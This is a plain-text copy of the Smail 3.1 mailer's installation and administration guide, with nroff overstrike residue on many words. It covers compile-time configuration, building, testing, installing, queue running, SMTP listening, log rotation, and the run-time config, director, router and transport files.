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m#ma#ai#il#l -#- I#In#ns#st#ta#al#ll#la#at#ti#io#on#n a#an#nd#d A#Ad#dm#mi#in#ni#is#st#t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o_#n_#a_#l_#d _#S_#. _#K_#a_#r_#r _#&lt;_#t_#r_#o_#n_#@_#u_#t_#s_#._#a_#m_#d_#a_#h_#l_#._#c_#o_#m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a_#n_#d_#o_#n _#C_#u_#r_#t _#N_#o_#l_#l _#&lt;_#c_#h_#o_#n_#g_#o_#@_#u_#t_#s_#._#a_#m_#d_#a_#h_#l_#._#c_#o_#m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ah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50 E. Arqu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nnyvale, CA  94088-3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m#ma#ai#il#l3#3.#.1#1  is a router and transport ag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 It receives  mail  messages  and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from  local  users  and  remote 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mail destined for  remote  hosts,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and  forwarding  transformations  on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nd performs  delivery.   S#Sm#ma#ai#il#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any  networking environment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conform to the DDN mail format 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the ARPAnet, CS-Net and th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UUC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er can be used to route mail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number  of conforming networks, and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methods for determining  the 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ose  networks  and performing delive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utually orthogonal operations of  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routing  and  transport are all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manner  with  consisten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mats  and C language driver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tools are included in  the  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which  are useful in building,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and displaying databases. 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operate  on  databases  used  by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Others are  useful  for  users  and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per  describes the s#sm#ma#ai#il#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he methodologies to use in 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configurations, tools for building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administration   concerns   that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m#ma#ai#il#l -#- I#In#ns#st#ta#al#ll#la#at#ti#io#on#n a#an#nd#d A#Ad#dm#mi#in#ni#is#st#t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R_#o_#n_#a_#l_#d _#S_#. _#K_#a_#r_#r _#&lt;_#t_#r_#o_#n_#@_#u_#t_#s_#._#a_#m_#d_#a_#h_#l_#._#c_#o_#m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L_#a_#n_#d_#o_#n _#C_#u_#r_#t _#N_#o_#l_#l _#&lt;_#c_#h_#o_#n_#g_#o_#@_#u_#t_#s_#._#a_#m_#d_#a_#h_#l_#._#c_#o_#m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dah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50 E. Arqu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nyvale, CA  94088-3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#sm#ma#ai#il#l3#3.#.1#1 program and its associated util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to provide an extensible mailer that  confor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DN  mail  format  standards in the ARPAnet _#R_#e_#q_#u_#e_#s_#t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m_#m_#e_#n_#t documents RFC822, RFC920 and RFC976. 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 and  transmit  mail  conforming  to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format standard described in RFC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design goal was to provide extens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 employed  for resolving local and remot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methods used for performing mail delive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bility is provided through drivers that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on the level of C language  subroutines,  and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configuration files which define parameters th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y how these drivers are to used.  The run-tim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files  are not required, and if they do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loaded configurations are used.  This allows many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with no run-tim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goal  was  to  provide a reliable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tolerant of system crashes and capable of  re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from  configuration errors.  To a limited extent, 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lso designed to recover from file systems that ru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pace, and from log files that cannot be opened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ese and other goals, we fel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also important that s#sm#ma#ai#il#l be compatible with the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interface of the Berkeley s#se#en#nd#dm#ma#ai#il#l program. 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bility  applies to the command line options, to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t as was feasible, but does not apply to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 operation  or  the  configuration  file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the configuration files for s#sm#ma#ai#il#l  and  for  s#se#en#nd#d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not only in their format, but also in their phil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 and in what they describe.  The  s#se#en#nd#dm#ma#ai#il#l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describe a syntax-directed model of recipi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, while the  s#sm#ma#ai#il#l  configuration  files  descri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model  of  recipient  address  routing, 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matching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  S#Sm#ma#ai#il#l I#In#ns#st#ta#al#ll#la#at#ti#io#on#n P#Pr#ro#oc#ce#ed#d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procedures for installing the  S#Sm#ma#ai#il#l3#3.#.1#1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and  its  associated utilities require that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number  of  compile-time  configuration  files,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  within  all  of  the smail make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ll of the executables and install them.   Some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ish to include the additional step of wri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which are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1#1.#.  T#Th#he#e S#So#ou#ur#rc#ce#e R#Re#el#le#ea#a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ceive a smail source release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under a directory, the following tree should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in text file describing the release and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l   installation   procedures  and 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of useful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rectory in which a  compatibility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 containing  functions that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system's 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rectory containing compile-tim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ME-d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file  that  should be copied and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 your machine and  the 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various files can be found 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rectory which contains  files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machine architectures, such a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tectures with and without  virtual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y,  or  16  bit architecture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rectory which contains  files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  possible   driver  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files define specifically which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,  router  and transport driv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in the smail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rectory which contains  files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 operating systems to which s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ported.  To as large  an  extent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e, operating system depend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solely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rectory contains  shell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files used from smail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igest configuration information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irectory containing the sourc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il guid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rectory contains the troff sour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_#S_#m_#a_#i_#l  _#A_#d_#m_#i_#n_#i_#s_#t_#r_#a_#t_#i_#o_#n  _#a_#n_#d  _#I_#n_#s_#t_#a_#l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describing the history of  smail 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erms  of source reorganizations and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of new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rectory containing nroff sources for  all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 included in the s#sm#ma#ai#il#l3#3.#.1#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1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pages for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5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 pages  describing run-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8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pages  for  administrativ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 programs  that  are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directly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rectory containing public domain sour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used  by  the smail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mail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placement for _#/_#b_#i_#n_#/_#m_#a_#i_#l that trap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s  and  sends  them to s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eneric System V  sites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 sites  that  are  not alread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a mailer program.  This is not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t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ublic  domain  release  of  the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#ge#et#to#op#pt#t library function.  Also included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opt  command  which implements a sup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ystem V _#g_#e_#t_#o_#p_#t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alias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#pa#at#th#ha#al#li#ia#as#s program by Steve  Bellovi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ld  to Peter Honeyman with additional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cations suggested by  Landon  Noll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s will be used as a basis for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lib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mplementation of various st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 will  be  used for syste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have  these  routines  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who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gram for viewing map entri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   USENET    in     the   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#co#om#mp#p.#.m#ma#ai#il#l.#.m#ma#ap#ps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c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for the s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s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ources  for  all  director driver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uted with smail.  Director driv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w level operations involved with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, forwarding and the recognition of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rs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urces for all routing drivers.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s handle the low  level  ope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ing  routes to hosts or domains and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remote addresses to specific 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s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sources   for  all  transport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rt drivers perform the low leve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s of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ources  for  various user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distributed with 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2#2.#.  C#Co#on#nf#fi#ig#gu#ur#ri#in#ng#g S#Sm#ma#ai#il#l f#fo#or#r Y#Yo#ou#ur#r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tep in configuring smail is to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D_#I_#T_#M_#E_#-_#d_#i_#s_#t,  in  the  source  directory  _#c_#o_#n_#f, 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D_#I_#T_#M_#E in the same directory.   As  the  name  impli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then  edit this file to describe your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shell script that is used to define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hat type of operating system you are us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of architecture, and where particular data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 should  reside.   It  is also used to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limited range, the default configura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optional runtime configuration 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E_#D_#I_#T_#M_#E file itself contains descriptions of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that can be defined in this file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duplicate all of the information here,  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pointers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2#2.#.1#1.#.  D#De#ef#fi#in#ni#in#ng#g y#yo#ou#ur#r O#Op#pe#er#ra#at#ti#in#ng#g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ariable  OS_TYPE  defines  the base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ould describe your operating system.  Possible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s  for  OS_TYPE  are  the  names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/_#o_#s.  If none of these files  accurately  describ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then  a  new  file should be created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_#t_#e_#m_#p_#l_#a_#t_#e to a new name and editing i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ort Smail to a new machine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 any  patches that were required as well as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bing that machine.  Any reasonable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2#2.#.2#2.#.  D#De#ef#fi#in#ni#in#ng#g y#yo#ou#ur#r H#Ho#os#st#tn#na#am#m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a number of variables used to describ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machine.  Usually, most of these variabl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undefined,  forcing smail to compute the nam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variables that you may  wish  to  change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namespaces  in  which your machine resides.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 will often require more hostname information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can  handle mail sent to the domains that they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o a specific host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important variable to  set  is  DOMA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  the  domains  under  which  your  host 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m#ma#ai#il#l3#3.#.1#1  will  use   a   system-dependent   algorithm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 the  name for the local host, such as the _#g_#e_#t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s_#t_#n_#a_#m_#e(2)  system  call  in  a  BSD  operating  sys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a_#m_#e(2)  under System V.  The value of DOMAINS, in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with the computed value for  your  machine's  nam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form a list of fully qualified names for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sites in the UUCP zone, DOMAINS  should  simp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o ``uucp'', while domain gateways may need to us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le    values,    separated    by    colons,    such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ts.amdahl.com:amdahl.com:uucp''.   The  firs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ist is special in that it is used  in  for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 (or  _#c_#a_#n_#o_#n_#i_#c_#a_#l)  name  for your machin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nique across all access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derstand the use of the  DOMAINS  variable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value  that is used for the gateway mach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a#am#md#da#ah#hl#l.#.c#co#om#m.  The machine name  for  this  gatew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m#md#da#ah#hl#l.        Its       value      for      DOMAINS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ts.amdahl.com:amdahl.com:uucp''.   With  this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  the    primary    name    for    the   gatewa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m#md#da#ah#hl#l.#.u#ut#ts#s.#.a#am#md#da#ah#hl#l.#.c#co#om#m     with     other     names  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m#md#da#ah#hl#l.#.a#am#md#da#ah#hl#l.#.c#co#om#m and a#am#md#da#ah#hl#l.#.u#uu#uc#cp#p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 names  can  be given to your machine,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to the name smail computes for your ho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for  gateways  that  wish to be recogniz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domains for which they are a gatewa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_NAMES  should be set to this colon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 hostnames.   As  an  example,  the  gateway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amdahl''           sets          GATEWAY_NAMES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ts.amdahl.com:amdahl.com''.  Thus,  an  addres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o#os#st#tm#ma#as#st#te#er#r@#@a#am#md#da#ah#hl#l.#.c#co#om#m   or   P#Po#os#st#tm#ma#as#st#te#er#r@#@u#ut#ts#s.#.a#am#md#da#ah#hl#l.#.c#co#om#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 responsible person rather than being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inal note on defining host  names,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_NAME  can  be  used  to define the host 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referring to the local host.  This  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in contexts where the canonical nam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DN standards and can be used to group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under a domain.  When resolving addresses, the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LE_NAME string is not matched as a local  hostnam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appears in either HOSTNAMES or GATEWAY_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most suns within the u#ut#ts#s.#.a#am#md#da#ah#hl#l.#.c#co#om#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SIBLE_NAME to  ``uts.amdahl.com''.   Mail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c#ch#ho#on#ng#go#o  on  a  Sun named e#ee#ek#k would appear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 from   c#ch#ho#on#ng#go#o@#@u#ut#ts#s.#.a#am#md#da#ah#hl#l.#.c#co#om#m,   rather   tha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h#ho#on#ng#go#o@#@e#ee#ek#k.#.u#ut#ts#s.#.a#am#md#da#ah#hl#l.#.c#co#om#m.   The  domain gateway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#ch#ho#on#ng#go#o wishes to receive his mail.   Thus, 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il sent from e#ee#ek#k will be returned directly to c#ch#ho#on#ng#go#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 rather than passing back through e#ee#ek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2#2.#.3#3.#.  D#Di#ir#re#ec#ct#to#or#ri#ie#es#s f#fo#or#r D#Da#at#ta#a F#Fi#il#le#es#s a#an#nd#d E#Ex#xe#ec#cu#ut#t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istributed, programs intended to be  run  by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stalled under the directory _#/_#u_#s_#r_#/_#l_#o_#c_#a_#l, whi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 intended to be run only from cron jobs or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il programs will be installed under _#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l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 files  will   also   be   searched   for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l_#i_#b_#/_#s_#m_#a_#i_#l.   In  addition,  spool and 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a hierarchy under _#/_#u_#s_#r_#/_#s_#p_#o_#o_#l_#/_#s_#m_#a_#i_#l.   These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can be changed by setting the variables SMAIL_BIN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_DIR and SPOOL_DI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ame implies, SPOOL_DIRS can contai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directory  name.   This  can be used to def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directory hierarchies.  When a new message  comes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ttempt  is made to write it into the first hierarc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.  If the file cannot be written, the next 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y  is  tried, then the next and so on until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or no more directory names  exist  in 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     example,        with       a       value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/usr/spool/smail:/usr2/spool/smail,''  if  the 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_#/_#u_#s_#r_#/_#s_#p_#o_#o_#l_#/_#s_#m_#a_#i_#l fills up or runs out of _#I-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ttempt  is  made  to   write   a   spool   file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2_#/_#s_#p_#o_#o_#l_#/_#s_#m_#a_#i_#l  instead.   Only if this secon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filled up will smail give up in trying to spo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other  path     names that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IL_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name used by smail utilities in  exec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.  Normally, this will be _#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#e_#n_#d_#m_#a_#i_#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ere Berkeley commands  and  utilities  exp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to reside, and where many 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expect the mailer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SMAIL_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full pathnames under which smai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   _#/_#b_#i_#n_#/_#r_#m_#a_#i_#l should be in this list,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oming in over uucp.  _#/_#b_#i_#n_#/_#r_#s_#m_#t_#p can  also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list.  When invoked under this name, batche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ll be read  from  standard  input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TP  to  be  used  over UUCP between cooperating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LI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ternate pathname for the m#mk#ka#al#li#ia#as#se#es#s utilit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 an alias file for use by an _#a_#l_#i_#a_#s_#f_#i_#l_#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.  By installing it as n#ne#ew#wa#al#li#ia#as#se#es#s, some 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 can be maintained with the s#se#en#nd#dm#ma#ai#il#l u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name.  The primary difference is that the ne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is  not  set-uid  and  cannot  be safely mad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users which do  not  have  write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containing  the aliases file can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_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name of the primary aliasing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processed by the m#mk#ka#al#li#ia#as#se#es#s ut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only alias file defined in the  default  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  To maintain compatibility with s#se#en#nd#d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4.2BSD  and  4.3BSD,  this  should  be  se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/usr/lib/aliases''.   However,  you  may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under LIB_DIR with the other smai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files.   This can be done by setting it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alias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3#3.#.  B#Bu#ui#il#ld#di#in#ng#g t#th#he#e S#Sm#ma#ai#il#l P#Pr#ro#og#gr#ra#am#m a#an#nd#d U#Ut#ti#il#li#it#ti#i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DITME and other compile-tim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 adjusted  (see the section C#Co#on#nf#fi#ig#gu#ur#ri#in#ng#g S#Sm#ma#ai#il#l f#f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o#ou#ur#r S#Sy#ys#st#te#em#m) you are ready to start the  build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 in  building  the  smail program and utilit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s to generate all  of  the  _#M_#a_#k_#e_#f_#i_#l_#e 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tep  will allow you to modify compile-tim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s and header files  without  worrying  ab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s  will depend on them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Makefiles that need them.  To  generat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top of the smail source hierarchy.  Thi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so you may wish to send the standard output an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 error  to  a  file  and put the command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in the Bourne or Korn Shell with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epend &gt; mkdep.out 2&gt;&amp;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-shell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epend &gt;&amp; mkdep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watch  the progress of the operation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l -f mkde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ependencies have been built, build all of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abl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n  Amdahl 5890 this takes two minutes or mo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machine  load.   For  other  machines,  this  ma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 half hour and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4#4.#.  V#Ve#er#ri#if#fy#yi#in#ng#g t#th#he#e S#Sm#ma#ai#il#l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a  good  idea  to verify that the s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before actually  installation  it  and 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it.  A simple way to do this is to run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out, tr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c/smail -bv -v _#y_#o_#u_#r_#-_#n_#a_#m_#e@_#l_#o_#c_#a_#l_#-_#h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_#y_#o_#u_#r_#-_#n_#a_#m_#e should be your login name on the local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l_#o_#c_#a_#l_#-_#h_#o_#s_#t should be a name for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user matched user _#y_#o_#u_#r_#-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y_#o_#u_#r_#-_#u_#s_#e_#r ... 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become superuser (r#ro#oo#ot#t on most UN*X mach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c/smail -v _#y_#o_#u_#r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produce outpu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/usr/spool/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/usr/spool/smail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pool file is /usr/spool/smail/input/0dMgpi-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give a message on standard inpu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This is a first test of Smail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hi mom, please send mone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t, on a line by itself, will  terminate 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 an  end  of file character will also suff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/usr/spool/smail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_log:new msg: from _#y_#o_#u_#r_#-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user matched user _#y_#o_#u_#r_#-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 local uses driver app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_log:_#y_#o_#u_#r_#-_#u_#s_#e_#r ...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/usr/spool/smail/ms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mail creates any directories that it requi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 not already exist.  You should now ha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ll  of this worked, then there is probab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ly wrong with the smai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5#5.#.  I#In#ns#st#ta#al#ll#li#in#ng#g t#th#he#e P#Pr#ro#og#gr#ra#am#m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satisfied that the  setup  appea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 try installing the programs on your machine by b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uperuser and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ny required directories and will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ies  and  a small number of data files in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  The installation process will creat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LIB_DIR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#ge#et#to#op#pt#t,  p#pa#at#th#ha#al#li#ia#as#s,  m#ma#ak#ke#ed#db#b,  a#ar#rp#pa#at#tx#xt#t,  m#mk#kl#li#in#ne#e, m#mk#ks#so#or#rt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#dc#ca#as#se#eh#ho#os#st#t, m#mk#kd#db#bm#m, m#mk#kp#pa#at#th#h, m#mk#kh#hp#pa#at#th#h, m#mk#ku#uu#uw#wh#ho#o,  p#pa#at#th#hm#me#er#rg#g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ch#he#ec#ck#ke#er#rr#r,  s#sa#av#ve#el#lo#og#g, g#ge#et#tm#ma#ap#p, g#gl#le#ee#em#m, and u#un#ns#sh#ha#ar#rm#ma#ap#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  into  the  LIB_DIR  directory  are  th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k_#p_#a_#t_#h_#._#a_#w_#k,  _#m_#k_#u_#u_#w_#h_#o_#._#a_#w_#k  and _#m_#k_#p_#a_#t_#h_#._#s_#e_#d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ome of the above programs,  and  the  file  _#C_#O_#P_#Y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states  your rights and responsibilities in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 distribution of the s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SMAIL_BIN_DIR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#uu#uw#wh#ho#o and m#mk#ka#al#li#ia#as#se#es#s.  Also, the smail binary is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names s#sm#ma#ai#il#l, m#ma#ai#il#lq#q, p#pa#at#th#ht#to#o, o#op#pt#tt#to#o, u#uu#up#pa#at#th#h, r#ru#un#nq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#rs#sm#mt#tp#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il binary will also be copied  to  whatev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 in the _#E_#D_#I_#T_#M_#E file as the SMAIL_NAME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_#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#e_#n_#d_#m_#a_#i_#l.  It will also be  copi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listed in OTHER_SMAIL_NAMES, such as _#/_#b_#i_#n_#/_#r_#m_#a_#i_#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b_#i_#n_#/_#r_#s_#m_#t_#p.  Also, if you defined a value for NEWALIA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E_#D_#I_#T_#M_#E file, such as _#/_#u_#s_#r_#/_#l_#o_#c_#a_#l_#/_#b_#i_#n_#/_#n_#e_#w_#a_#l_#i_#a_#s_#e_#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k#ka#al#li#ia#as#se#es#s program will be copie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copies of the smail binary will be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 and  have  the  set-uid  bit  set.   S#Sm#ma#ai#il#l3#3.#.1#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so that it does not need to  run  as  root,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reates  the potential for a a variety of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which must be carefully handled  through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files.   It  is generally easier to install smai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id to root program so  that  the  potential  for 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 attacks is more easi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implementation  of  m#mk#ka#al#li#ia#as#se#es#s is a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script which cannot be made secure as  a  setui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Thus, only users that can write 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the aliases file can successfully run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behavior  is  incompatible with the n#ne#ew#wa#al#li#ia#as#se#es#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with  Berkeley's  s#se#en#nd#dm#ma#ai#il#l  program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6#6.#.  S#Sm#ma#ai#il#l Q#Qu#ue#eu#ue#e R#Ru#u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messages  block for some reason and smail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be best to retry deliver at a later time,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 will  be left in the _#i_#n_#p_#u_#t spool directory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ttempt delivery, a smail  process  must  sca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irectory  at  intervals  looking  for wor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e accomplished by starting up one smail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for work, sleeps for a set time period, and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or _#c_#r_#o_#n(8) can be used to start up a process to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rtup  a single smail process that scans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intervals,  execute  the  following  command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's _#/_#e_#t_#c_#/_#r_#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sendmail -q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scan for work every twenty minutes. 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ce per hour use an argument of  -#-q#q1#1h#h  instea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will automatically put itself in backgroun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need to use an ampersand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ecute smail periodically from  cron,  use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20,40 * * * * /usr/lib/sendmail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invocation  of  smail  with  this comm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scan through the _#i_#n_#p_#u_#t  spool  director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one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 using the S#Sy#ys#st#te#em#m V#V cron program can safe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the crontab file for r#ro#oo#ot#t, or in any  other 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Sites  running  the 4.3BSD version of cron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_#/_#u_#s_#r_#/_#l_#i_#b_#/_#c_#r_#o_#n_#t_#a_#b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20,40 * * * * root /usr/lib/sendmai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7#7.#.  L#Li#is#st#te#en#ni#in#ng#g f#fo#or#r S#SM#MT#TP#P R#Re#eq#qu#ue#es#s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ite supports Berkeley networking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mail to process interactive SMTP request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either from a non-exiting smail  daemon,  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BSD  or  Sun  _#i_#n_#e_#t daemon.  The decision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mail daemon, or the inet daemon depends up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passes  through  your  site and whether or no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pare 300K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a smail daemon at system boot  time,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 from _#/_#e_#t_#c_#/_#r_#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sendmail -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n be combined with the -#-q#q flag described i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us section, so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sendmail -bd -q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dle listening for SMTP connection reques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of the _#i_#n_#p_#u_#t directory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invoke smail from the 4.3BSD _#i_#n_#e_#t_#d program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in _#/_#e_#t_#c_#/_#i_#n_#e_#t_#d_#._#c_#o_#n_#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tp stream    tcp  nowait    root /usr/local/smtpd s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s_#m_#t_#p_#d  was  installed  in  a  different  directory,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 is  appropriate  in place of _#/_#u_#s_#r_#/_#l_#o_#c_#a_#l_#/_#s_#m_#t_#p_#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smail from the SunOS _#i_#n_#e_#t_#d program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_#/_#e_#t_#c_#/_#s_#e_#r_#v_#e_#r_#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tp tcp  /usr/local/s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have  some other form of network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used to create a bi-directional interact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ion,  you  can  use  the  _#s_#m_#t_#p_#d  program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l_#i_#b_#/_#s_#e_#n_#d_#m_#a_#i_#l _#-_#b_#s to receive SMTP requests over tha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8#8.#.  C#Cl#le#ea#an#ni#in#ng#g U#Up#p A#Af#ft#te#er#r S#S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il  creates  log  files.  If log files are not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in a reasonable manner, then they will eventua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all  available  space.  To handle log file trun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script, _#s_#a_#v_#e_#l_#o_#g is provided to cycle a log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of  files, where no more than a set number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.  As an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smail/savelog /usr/spool/smail/log/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  rename     the     smail      log      file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s_#p_#o_#o_#l_#/_#s_#m_#a_#i_#l_#/_#l_#o_#g_#/_#O_#L_#D_#/_#l_#o_#g_#f_#i_#l_#e_#._#1.   If  this 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it will be renamed to _#l_#o_#g_#f_#i_#l_#e_#._#2 before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 is  renamed,  and  so on up to _#l_#o_#g_#f_#i_#l_#e_#._#7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f_#i_#l_#e_#._#6 is renamed to _#l_#o_#g_#f_#i_#l_#e_#._#7, this last file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_#c_#o_#m_#p_#r_#e_#s_#s  program is available, then _#l_#o_#g_#f_#i_#l_#e_#.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_#l_#o_#g_#f_#i_#l_#e_#._#7 are kept in  a  compressed  for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_#._#Z.  Different compression program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generating logfiles with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above savelog command from  cron  onc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will  thus  keep  the  last seven days worth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much of it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,  smail  will  run  into  a  probl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he attention of a mail administrato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s an error in the configuration file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lly retrying a message and continually failing,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are moved into an  _#e_#r_#r_#o_#r  directory  under  the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hierarchy.   The  utility  c#ch#he#ec#ck#ke#er#rr#r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ron to check up on this directory  at  interva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a report on newly failed messages to the address P#Po#os#st#t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a#as#st#te#er#r.  This script should  be  run  periodically,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per day, under a user that can write to the _#e_#r_#r_#o_#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Normally, this requires that  it  run  as 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the  _#c_#h_#o_#w_#n(1)  command  can  be  used to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an alterna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  S#Se#et#tt#ti#in#ng#g u#up#p R#Ru#un#n-#-t#ti#im#me#e C#Co#on#nf#fi#ig#gu#ur#ra#at#ti#io#on#n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#sm#ma#ai#il#l3#3.#.1#1 binary is preloaded with a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 and needs no run-time configuration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aded configuration file is tunable over a  small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 _#E_#D_#I_#T_#M_#E file, and should be suffic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.  However, if this configuration is not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site,  or  if  you  wish  to define a rout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e_#t_#h_#o_#d files, then  you  can  write  run-tim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adapt smail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1#1.#.  T#Ty#yp#pe#es#s o#of#f R#Ru#un#n-#-t#ti#im#me#e C#Co#on#nf#fi#ig#gu#ur#ra#at#ti#io#on#n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ive types of run-tim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one  or two c#co#on#nf#fi#ig#g files, used to set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ty of smai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d#di#ir#re#ec#ct#to#or#rs#s file, describing the rules for reso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loca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r#ro#ou#ut#te#er#rs#s file, describing the rules for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t#tr#ra#an#ns#sp#po#or#rt#ts#s file, describing the possi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erforming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nd  zero  or more m#me#et#th#ho#od#d files, which match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ctions give  overviews  of  the  forma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iles,  with  examples  of their us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escription see the man page _#s_#m_#a_#i_#l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1#1.#.1#1.#.  C#Co#on#nf#fi#ig#g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achine may have a primary and a  secondary  c#co#on#nf#fi#i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hich redefines the values for a number of smai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.  These files can be used  to  define  nam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host,  define  where files reside, setup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definable message header fields and more.   Valu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imary config file override values pre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il binary.  Values set in the secondary config fil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  values  defined  in the smail binary or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Also, the name of the secondary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be redefined in the prim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pability  for having two such file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ed environments with  distributed  filesyste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on  the Sun network at Amdahl Corp.,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of   the   primary   configuration   file    to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l_#o_#c_#a_#l_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l_#/_#c_#o_#n_#f_#i_#g  which  is  found  on  ou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  This file is maintained by the  group  that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 the  mailers running on all of the Sun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defines a  secondary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 _#/_#p_#r_#i_#v_#a_#t_#e_#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l_#/_#c_#o_#n_#f_#i_#g.  If such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given workstation, it  can  be  used  to  re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 behavior  on that workstation without requir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is second configuration file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 to  any  other  configuration  file or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of the mailer behavior can be changed.  Thus, a g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machine  can use the same primary config file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ransport file as the other suns  while  us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 private router file.  In addition, a machine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elivery agent is being tested can define a privat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 file that points to its own router and trans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either  config  file  consists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that  set a variable equal to some value. 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a string or numeric value,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v_#a_#r_#i_#a_#b_#l_#e =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master = tron@glotz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s = w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_mode = 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 the   default   address   for   the   postmast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tron@glotz.uucp'',  sets  the  run-time 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 variable DOMAINS to ``wall.com'' and sets the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mode for spool files to allow the file owner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attributes can be set using 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_#b_#o_#o_#l_#e_#a_#n_#-_#v_#a_#r_#i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reset using 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_#b_#o_#o_#l_#e_#a_#n_#-_#v_#a_#r_#i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`-_#v_#a_#r_#i_#a_#b_#l_#e'' notation can also be used to se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zero and to unset a value for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config file disables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xternal  transport file and tells smail tha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s are not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require_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using the shell `#' notation and  blank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in  config  files.   In  addition,  record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y including white space at the beginning  of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ve  lines.  For example, the following config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#Re#ec#ce#ei#iv#ve#ed#d:#: header field to use for messages to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value  and sets the name of a user that has f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se a verbose format for the Received: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_field = "Received: by $prima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mail ($version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&lt;$message_id@$primary_name); $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body = unknown         # unknown has few acces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list of variables that can be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 is described in the man page _#s_#m_#a_#i_#l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1#1.#.2#2.#.  D#Di#ir#re#ec#ct#to#or#rs#s,#, r#ro#ou#ut#te#er#rs#s a#an#nd#d T#Tr#ra#an#ns#sp#po#or#rt#ts#s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#di#ir#re#ec#ct#to#or#rs#s,  r#ro#ou#ut#te#er#rs#s  and t#tr#ra#an#ns#sp#po#or#rt#ts#s file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mat.  These files describe entries  in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each entry describes the attributes for on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 or transport.  The order of entries in  the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outer  files  is import, in that directors and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led in the order stated in the table. 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transport fil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try in one of these files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name by which that entr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 driver  which  implements the fun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set of _#g_#e_#n_#e_#r_#i_#c attributes from a se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d to any entr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 set  of  _#d_#r_#i_#v_#e_#r_#-_#s_#p_#e_#c_#i_#f_#i_#c attributes,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applied only to entries tha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n example, the director file entry below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for a director that reads alias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p_#r_#i_#v_#a_#t_#e_#/_#u_#s_#r_#/_#l_#i_#b_#/_#a_#l_#i_#a_#s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ad aliases from a file private to one machin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_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=aliasfile, owner=owner-$us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=/private/usr/lib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try  is  named _#p_#r_#i_#v_#a_#t_#e_#__#a_#l_#i_#a_#s_#e_#s, and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level director driver routine named  _#a_#l_#i_#a_#s_#f_#i_#l_#e.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while processing addresses found by this dir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n address formed by prepending  ``owner-''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the alias, and these the alia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_#/_#p_#r_#i_#v_#a_#t_#e_#/_#u_#s_#r_#/_#l_#i_#b_#/_#a_#l_#i_#a_#s_#e_#s.   The   _#a_#l_#i_#a_#s_#f_#i_#l_#e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mplements a general mechanism for looking up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database.  By default, this databas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ing  ASCII records in no particular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_#/_#p_#r_#i_#v_#a_#t_#e_#/_#u_#s_#r_#/_#l_#i_#b_#/_#a_#l_#i_#a_#s_#e_#s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ron is the postmaster for this particul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master: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list the users that are likely to use futats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atsu-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n,                    # Ronald S. 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ngo,                  # Landon Curt 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anu                  # Jay De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, as with other configuration files, an ali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extended  across  multiple lines by beginn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th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paration between _#g_#e_#n_#e_#r_#i_#c attributes  and  _#d_#r_#i_#v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p_#e_#c_#i_#f_#i_#c attributes mirrors the internal design of s#sm#ma#ai#il#l3#3.#.1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driver level, there exist routines tha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  of  drivers,  routers  and  transports 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 upon the specific means for perform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higher-level functions can be manipul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n_#e_#r_#i_#c attributes.  On the other  hand,  the  driv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perform these operations accept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to control their behavior.   In  the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hats read or writes to a file, a f#fi#il#le#e attribut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exists.  In the case of a driver that executes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a c#cm#md#d attribute usually exists to specify how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is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description of the  director,  ro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 files  is  contained  in  the  _#s_#m_#a_#i_#l(5)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man page is a description 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 that  are included in the s#sm#ma#ai#il#l3#3.#.1#1 sourc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following sections describe the preloaded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.   To serve as examples, these sections inclu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files which are the equivalent of  the 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2#2.#.  T#Th#he#e P#Pr#re#el#lo#oa#ad#de#ed#d C#Co#on#nf#fi#ig#gu#u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gain a better understanding of how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 files can be used to change the behavior of smai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seful to know what smail will do if run-tim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s were not used.  This behavior is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aded   configuration   which  is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r_#c_#/_#d_#e_#f_#a_#u_#l_#t_#.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loaded configuration currently comes in two f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s:  one  flavor  is  for systems that have Berke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with TCP/IP, the other flavor is for  si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such networking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a networking configuration defines two extra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tch  network  hosts  by  name  or b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e extra transport is defined to deliver  using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TCP/IP connection to a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2#2.#.1#1.#.  T#Th#he#e P#Pr#re#el#lo#oa#ad#de#ed#d D#Di#ir#re#ec#ct#to#or#r C#Co#on#nf#fi#ig#gu#u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 _#d_#i_#r_#e_#c_#t_#o_#r_#s configuration file is not found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then the default  pre-loaded  configuration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director  configuration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include and forward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cal addresses of the form :#:i#in#nc#cl#lu#ud#de#e:#:f#fi#il#le#en#na#am#me#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 will  be  expanded  into a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the given ASCII file.  The files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addresses  refer  are called _#m_#a_#i_#l_#i_#n_#g _#l_#i_#s_#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m of local address  can  come  from  any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 forward file or mailing list file. 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such address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 scans for entries in an  alias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is database, and the method by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earched can be changed in the _#E_#D_#I_#T_#M_#E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,   aliases   are   taken   from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/_#u_#s_#r_#/_#l_#i_#b_#/_#a_#l_#i_#a_#s_#e_#s, which is an unsorte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alias file is optional, and is ignore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ist.  Any errors found while resolving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  by an alias are mailed to an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``owner-'' prepended to the name of  the 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uch a local addre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for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user  may  have  a file named _#._#f_#o_#r_#w_#a_#r_#d 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 If such  a  file  exists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d  for  addresses.   Any  mail to a us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file will be redirected to  the  address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ed within it.  The file can contain addr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files or shell commands as recipient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 file  is owned by root or by the user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deliveries to any shell commands or files ar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ed  under the user's user and group id. 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while resolving this list of addresses ar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Postmaster.   In  a  forward fi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o_#o_#t, deliveries to shell command  and  fil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performed under an unprivileged user and group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is true in the case of forward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wned by root or by the given user.  Finally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nd file addresses are not allowed  at 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 files that are in remotely accessibl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box file for a user may contain a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to _#a_#d_#d_#r_#e_#s_#s, _#a_#d_#d_#r_#e_#s_#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n alternate method for a user to forward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e line is read from this file so addresses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placed across multiple lines.  The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 to a _#f_#o_#r_#w_#a_#r_#d file also apply to  this  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box  file, except that it is assumed that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in a remotely acce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is matched by name, either  in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 with delivery to that user being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nsport by the name of ``local''.  A user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matched  by  name  if  the  username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real-''.  Delivery is performed by a transpor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loc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 list files can be created under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is is a directory named _#l_#i_#s_#t_#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containing smail utiliti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typically _#/_#u_#s_#r_#/_#l_#i_#b_#/_#s_#m_#a_#i_#l).  A new  mail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 creating  by  making  a fil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tains a list of addresses.   The  base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le  determines  the local addres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to this list of  addresses.   For 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named  _#i_#n_#f_#o_#-_#s_#m_#a_#i_#l could be crea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  addresses  for  the  ``info-smail''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 Errors  in delivering to this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ailed to a local address with the name  ``owner-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ended  to  the  basename  of  the  file,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_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local address is not matched by any  other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 to  that  address  can be sent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#sm#ma#ar#rt#tu#us#se#er#r director.   The  address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il is redirected can be defined in a _#c_#o_#n_#f_#i_#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tting the variable s#sm#ma#ar#rt#t_#_u#us#se#er#r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 config  file  line could be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the host amdahl.uts.amdahl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_user = $user@amdahl.uts.amdah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not set, then the 